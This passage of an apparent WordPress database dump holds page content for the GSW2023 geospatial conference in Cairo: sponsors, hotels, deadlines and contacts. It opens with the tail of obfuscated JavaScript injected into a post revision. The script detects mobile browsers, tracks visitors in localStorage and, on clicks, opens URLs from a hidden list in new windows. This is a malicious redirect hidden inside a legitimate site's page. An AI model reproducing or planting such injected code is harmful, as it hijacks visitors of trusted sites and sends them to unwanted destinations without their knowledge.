)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-13 22:40:31','2023-06-13 22:40:31','',3066,'https://gsw2023.com/?p=4691',0,'revision','',0),
(4692,1,'2023-06-13 22:41:34','2023-06-13 22:41:34','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" 